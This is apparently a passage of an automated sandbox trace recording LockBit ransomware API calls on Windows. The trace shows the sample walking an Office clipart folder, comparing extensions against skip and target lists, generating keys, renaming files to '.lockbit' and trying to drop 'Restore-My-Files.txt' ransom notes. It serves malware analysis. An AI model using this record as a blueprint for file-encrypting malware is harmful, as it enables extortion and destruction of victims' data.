lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.844] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.844] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF.lockbit") returned 72 [0153.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241037.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0153.845] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.845] malloc (_Size=0x40068) returned 0x3fb00b8 [0153.847] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=2638) returned 1 [0153.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0153.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0153.848] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0153.857] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.857] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.857] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.858] free (_Block=0x1fa2ed8) [0153.858] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.858] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.859] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.859] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa059dd00, ftCreationTime.dwHighDateTime=0x1be9cda, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa059dd00, ftLastWriteTime.dwHighDateTime=0x1be9cda, nFileSizeHigh=0x0, nFileSizeLow=0x926, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241041.WMF", cAlternateFileName="")) returned 1 [0153.859] lstrcmpiW (lpString1=".", lpString2="J0241041.WMF") returned -1 [0153.859] lstrcmpiW (lpString1="..", lpString2="J0241041.WMF") returned -1 [0153.859] PathFindExtensionW (pszPath="J0241041.WMF") returned=".WMF" [0153.859] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.859] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.860] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.860] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.861] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241041.WMF") returned 1 [0153.861] lstrcmpiW (lpString1="ntldr", lpString2="J0241041.WMF") returned 1 [0153.861] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241041.WMF") returned 1 [0153.861] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241041.WMF") returned -1 [0153.861] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241041.WMF") returned -1 [0153.862] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241041.WMF") returned 1 [0153.862] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241041.WMF") returned -1 [0153.862] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.862] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF") returned=".WMF" [0153.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.862] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.862] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.863] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.863] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF.lockbit") returned 72 [0153.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241041.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0153.864] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.864] malloc (_Size=0x40068) returned 0x3e70008 [0153.865] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2342) returned 1 [0153.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0153.865] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.866] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0153.866] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0153.874] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.874] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.874] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.876] free (_Block=0x1fa2ed8) [0153.876] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.876] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.876] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.876] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18b0a00, ftCreationTime.dwHighDateTime=0x1be9cda, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa18b0a00, ftLastWriteTime.dwHighDateTime=0x1be9cda, nFileSizeHigh=0x0, nFileSizeLow=0xab2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241043.WMF", cAlternateFileName="")) returned 1 [0153.876] lstrcmpiW (lpString1=".", lpString2="J0241043.WMF") returned -1 [0153.876] lstrcmpiW (lpString1="..", lpString2="J0241043.WMF") returned -1 [0153.876] PathFindExtensionW (pszPath="J0241043.WMF") returned=".WMF" [0153.876] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.876] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.877] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.878] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.878] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0241043.WMF") returned 1 [0153.879] lstrcmpiW (lpString1="ntldr", lpString2="J0241043.WMF") returned 1 [0153.879] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0241043.WMF") returned 1 [0153.879] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0241043.WMF") returned -1 [0153.879] lstrcmpiW (lpString1="autorun.inf", lpString2="J0241043.WMF") returned -1 [0153.879] lstrcmpiW (lpString1="thumbs.db", lpString2="J0241043.WMF") returned 1 [0153.879] lstrcmpiW (lpString1="iconcache.db", lpString2="J0241043.WMF") returned -1 [0153.879] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.879] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF") returned=".WMF" [0153.879] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.879] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.879] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.880] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.880] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF.lockbit") returned 72 [0153.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241043.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0153.898] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.898] malloc (_Size=0x40068) returned 0x3df0008 [0153.899] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2738) returned 1 [0153.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.900] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.903] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.903] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.903] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.904] free (_Block=0x1fa2ed8) [0153.904] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.904] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.904] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49dda00, ftCreationTime.dwHighDateTime=0x1be9cda, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb49dda00, ftLastWriteTime.dwHighDateTime=0x1be9cda, nFileSizeHigh=0x0, nFileSizeLow=0x82a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0241077.WMF", cAlternateFileName="")) returned 1 [0153.905] lstrcmpiW (lpString1=".", lpString2="J0241077.WMF") returned -1 [0153.905] lstrcmpiW (lpString1="..", lpString2="J0241077.WMF") returned -1 [0153.905] PathFindExtensionW (pszPath="J0241077.WMF") returned=".WMF" [0153.905] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.905] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.906] lstrcmpiW (lpString1=".bin", 